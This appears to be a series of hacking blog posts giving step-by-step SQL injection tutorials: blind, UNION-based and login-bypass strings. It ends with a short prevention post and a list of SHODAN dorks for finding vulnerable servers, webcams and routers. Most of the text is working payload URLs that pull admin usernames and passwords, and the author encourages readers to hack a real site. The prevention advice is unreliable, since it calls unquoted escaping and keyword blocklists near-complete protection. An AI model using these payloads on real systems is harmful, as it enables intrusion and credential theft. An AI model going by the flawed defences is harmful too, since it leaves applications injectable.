SQL INJECTION IN DETAIL (Cont.)

Hello i am back with a good news that i got a job :) Lets continue with my previous article about SQL Injection
here i am explaining you about blind sqli . its a time taking injection because here you will have to guess many thing, it means that you shud have a good guessing power as well as luck :).


BLIND SQL INJECTION :-
     I think here i need to write definition of blind injection. so i am copying it from wikipedia . here is the definition : http://en.wikipedia.org/wiki/SQL_injection#Blind_SQL_injection

Testing IF target is vulnerable to mysql blind :-
=> http://targetsite.com/news.php?id=5 and 1=1
 ^ as this is always true  & page loads normally :))
=> http://test.com/news.php?id=5 and 1=2
^ this one is False  :P So if some text, picture or some content is missing on returned page then that site is vulnerable to blind sql injection.

Getting Mysql version in blind sqli to get the version in blind attack we use substring i.e
  => http://targetsite.com/news.php?id=5 and substring(@@version,1,1)=4
       ^ this should return TRUE if the version of MySQL is 4.(replace 4 with 5, and if query return TRUE then the version is 5).
Now test if subselect works (when select don't work then we use subselect)
i.e
=> http://targetsite.com/news.php?id=5 and (select 1)=1
      ^ if page loads normally then subselects work.
Now, Let's see if we have access to => Mysql.user
=> http://targetsite.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can fetch some password using load_file() function and OUTFILE.

Check table and column names :- 
# Guessing work starts that is,
=> http://targetsite.com/news.php?id=5 and (select 1 from users limit 0,1)=1
  ^(with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row,this is very important, then if the page loads normally without content missing, the table users exits. If you get FALSE (OR some content missing), just change table name until you guess the right one :). Let's say that I have found that table name is users, now what we need is column name !! :D
# The same as table name, we start guessing.
=> http://targetsite.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
#if the page loads normally we know that column name is password (if we get false then try common names or just guess)
here we merge 1 with the column password, then substring returns the first character (,1,1)

 Fetch data from database :-
I found table users i columns username password so I'm gonna pull characters from that.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
ok this here fetches the first character from first user in table users.
substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value
 and then compare it with symbol greater then " >" . So if the ascii char greater then 80, the page loads normally. TRUE

>> keep trying until get false.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95
# we get TRUE, keep incrementing
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, increment
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
got FALSE!!!
So the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

=>> then let's check the second character.
# http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99
# Note that i'hv changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in length.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107
# FALSE, lower number.
=> http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104
# TRUE, increment.
http://targetsite.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105
# FALSE!!!
# we know that the second character is char(105) and that is 'i'. We have 'ci' so far
# so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end and we have got that data which we wanted from the table.

I know that this injection is really boring and tuff . So try hacking using this method atleast one site else there are many tools which helps u in blind SQLI , You can use them also.

Wait for my next article :)
sanjeev

SQL INJECTION IN DETAIL

Today i am posting this article after so many days because i was busy in placement like stuffs.
Hello guys My last post was on "prevention against SQLI" so i decided to write about SQL Injection attack :P .Here i will explain every thing briefly but make yourself sure that you wont use this information in wrong things As i don't take any responsibility of what you guys do with this information its all up to you :)
 So lets start Today i will explain you about
1 STRING INJECTION : To bypass login forms authentication.
2 UNION SELECT
3 BLIND SQLI
4 ERROR BASED SQL INJECTION   /* in mssql i have not tried this one but will post about this also*/

1. So Lets start with first one. This is so simple and even any one can try his/her hands in bypassing login forms security using this method.In this method first you have to search admin login page of the site you want to hack. You can find it using your intelligence or using some free available tools . Now after getting login
page all you have to do is just enter administrator's username and password and you are done.
Lets move on to second method.....hahahaha ......dont get angry...still we have to do some task after getting login page because we dont have admin's username and password.
Now if you are lucky enough then your target may be vulnurable to this attack . All you have to do it ,write following information in form

USERNAME : admin , administrator ,master ,manager ,targetsite_admin ,%admin% or you can try some general username in most of the cases these will work depending on your luck :P

PASSWORD : In password field use any of these strings.

' or 1=1-- 

" or 1=1-- 

or 1=1--

1'or'1'='1

' or 'a'='a

" or "a"="a

') or ('a'='a

") or ("a"="a

Finally you are done. If your target is vulnerable you will get access for sure. 

2. Union method :Now move towards some real work. In this you have to do everything manually by using your mind and skills , Lets start the job

>>> >>> >>> 

 Let's start with union Attack :

Our aim is to find TABLE NAME , COLUMN NAME and then username and password

=> http://targetsite.com/index.php?id=1 order by 10--

^ This gives me an error

keep trying

=> http://targetsite.com/index.php?id=1 order by 7--

^ again error arggg!!!! i hate it

keep trying

=> http://targetsite.com/index.php?id=1 order by 5--

the page is Loading normally.........woooooohh 

It means, Number of columns = 5

 Now the next part-

 using union select statement.

=> http://targetsite.com/index.php?id=1 union all select 1,2,3,4,5--

If it doesn't gives you anything, change the first part of the query to a negative value.

=> http://targetsite.com/index.php?id=-1 union all select 1,2,3,4,5--

It'll show some number on you screen. Lets say it is 2. Now we know that column 2 will echo data back to us. :D

Now getting Mysql version

=> http://targetsite.com/index.php?id=-1 union all select 1,@@version,3,4,5--

If you do not get with this try this-

=> http://targetsite.com/index.php?id=-1 union select 1,version()),3,4,5--

Now you will get get the version name

it can be-

==> 5+ /* version above 5*/

==>5> /*version below 5 */

Now Extracting table for version 5+ :

=> http://targetsite.com/index.php?id=-1 union all select 1,group_concat(table_name),3,4,5 from information_schema.tables--

It'll show a lot of tables, if you want to get the admin privilege in order to hack the site then you are looking for "admin" table. 

Now I got the Tables names & I need to extract the column names from them so the query will be-

=> http://targetsite.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=admin--

This will show you the column names inside the table Admin. if it gives you an error you need to change the text value of admin to mysql char.Use hackbar, a Firefox addon to do so. OR use any other tool OR write it by your qwn if you know ascii value of every character.

so char of admin is =>CHAR(97, 100, 109, 105, 110)

therefore the query will be-

=> http://targetsite.com/index.php?id=-1 union all select 1,group_concat(column_name),3,4,5 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

It will show you many tables but we only need admin table and password table 

=> http://targetsite.com/index.php?id=-1 union all select 1, group_concat (user_name,0x3a,user_password) ,3,4,5   from admin--              
 /*where 0x3a is the hex value of => : (colon) */

wooooohhh its tym to party you got the admin name and password

password can also be encrypted. So you can use decrypters to decode them .

This was all for Mysql 5+

=============================================================

=============================================================

Let's Start with mysql version below 5 : 

Version 4 or below 5 does not contain any ==> Information_schema

 This method is all about guessing :p

We know the number of columns that is 5.

=> Let's Start guessing the table:

=> http://targetsite.com/index.php?id=-1 union all select 1,2,3,4,5 from users--

^ got error ...give one more try 

 => http://targetsite.com/index.php?id=-1 union all select 1,2,3,4,5 from Admin--

^ Suppose this does not gives me error it means it worked and we got table name 

==> Next part is Guessing the columns:

as we had done earlier & had found the vulnerable column is 2...so lets proceed further.

=> http://targetsite.com/index.php?id=-1 union all select 1,user,3,4,5 from admin--

^ got error. shit!!!!!! 

=> http://test.com/index.php?id=-1 union all select 1,username,3,4,5 from admin--

^ no error.....ya i got the column name

==> let's guess the password column now

=> http://test.com/index.php?id=-1 union all select 1,pass,3,4,5 from admin--

^ got an error one more try-

=> http://targetsite.com/index.php?id=-1 union all select 1,password,3,4,5 from admin--

We did it we got the password column successfuly so cheers

This is end of  union method for mysql you can try the same for mssql.  Wait for my next post i will post about Blind injection and error based both :)

Prevention against SQL Injection

Hello Friends these days i have hacked many sites using SQL Injection . So i thought about writing how to prevent our web page against this attack. There are many methods to prevent SQLI but i am writing few of them.
Lets say our code is

<?php

$display = mysql_query(‘SELECT text FROM pages WHERE id=’ . $_GET['id']);
echo($display);

?>

This means that we are selecting the page content ‘text’ from ‘pages’ in the SQL database, and we are selecting the right page content with $_GET['id'] and $_GET['id'] is the thing in the url , for example
                       http://target.com/index.php?id=21
The above code is easily injectable and is enough for an attacker to enter your site without proper authentication.
But if we replace above code with the code written below then i guess we are 99.9% secure :P

<?php

$display = mysql_query(‘SELECT text FROM pages WHERE id=’ . mysql_real_escape_string($_GET['id']));
echo($display);

?>

In above code mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, ', " . This function must always be used to make data safe before sending a query to MySQL.
Alternatively we can check $_GET['id'] for illegal and unwanted characters like this :

<?php

$inject = strrpos(strtolower($_GET['id']), “union”);
if ($inject === false){}else
{
die;
}

$inject = strrpos(strtolower($_GET['id']), “select”);
if ($inject === false){}else
{
die;
}

 $display = mysql_query(‘SELECT text FROM pages WHERE id=’ . $_GET['id']);

echo($display);

?>

Similarly we can block Information_ ,_schema, admin ,order , and other such keywords . :)
If we want we can use javascript to block and filter characters . This would be also useful to get rid of basic SQL string injection which is done at login forms.

I hope you like this post :=))

Advance search engine for hackers - SHODAN

Hello Guys are you tired of using google dorks to search your target? or you think that it takes time to search for vulnerability because it is hit and trial method :P
Today i am posting about SHODAN search engine . I found it very useful in searching servers , routers , webcam ,ports etc .It finds computer running certain softwares (HTTP,FTP etc) and most interesting it filters hosts based on geographical locations directly.
    SHODAN stands for Sentient Hyper-Optimized Data Access Network . It gives more accurate as well as helpful information. If you are really looking for vulnerability then use shodan and google you will feel the difference i am saying this because google looks at the web content only where as, Shodan can show you in plain text the network part of the host.
Here is the websites link http://www.shodanhq.com
eg Let us suppose i want to search for hosts which are running IIS 5 server then my query will be :

http://www.shodanhq.com/?q=iis+5.0
It gives results as:

" HTTP/1.0 403 Forbidden 
Content-Length: 1283 
Content-Type: text/html 
Server: Microsoft-IIS/6.0 
MicrosoftOfficeWebServer: 5.0_Pub 
X-Powered-By: ASP.NET 
Date: Tue, 01 Feb 2011 20:37:47 GMT  "


Just like this you will get 1123104 results for iis 5.0.

Here i am posting some dorks for SHODAN that will help you to search

http://shodan.surtri.com/?q=cisco-IOS
http://shodan.surtri.com/?q=IIS+4.0
http://shodan.surtri.com/?q=Xerver (REF: http://www.exploit-db.com/exploits/9718)
http://shodan.surtri.com/?q=Fuji+xerox
http://shodan.surtri.com/?q=JetDirect
http://shodan.surtri.com/?q=port:23+%22list+of+built-in+commands%22
http://shodan.surtri.com/?q=port%3A80+iisstart.html
http://shodan.surtri.com/?q=Server:%20SQ-WEBCAM
http://shodan.surtri.com/?q=Netgear
http://shodan.surtri.com/?q=%22Anonymous+access+allowed%22
http://shodan.surtri.com/?q=Golden+FTP+Server 
http://shodan.surtri.com/?q=IIS+5.0  
http://shodan.surtri.com/?q=IIS+6.0
http://shodan.surtri.com/?q=%22Server%3A+iWeb%22+HTTP 
http://shodan.surtri.com/?q=Wordpress
http://shodan.surtri.com/?q=Joomla
http://shodan.surtri.com/?q=Drupal
http://shodan.surtri.com/?q=iPhone+Web+Server
http://shodan.surtri.com/?q=FreeBSD
http://shodan.surtri.com/?q=IPCop

There are more dorks if you need them just send me mail. 

Now rest things depends on your brain and commonsense . Use your intelligence to use it efficiently.

Happy Searching :=))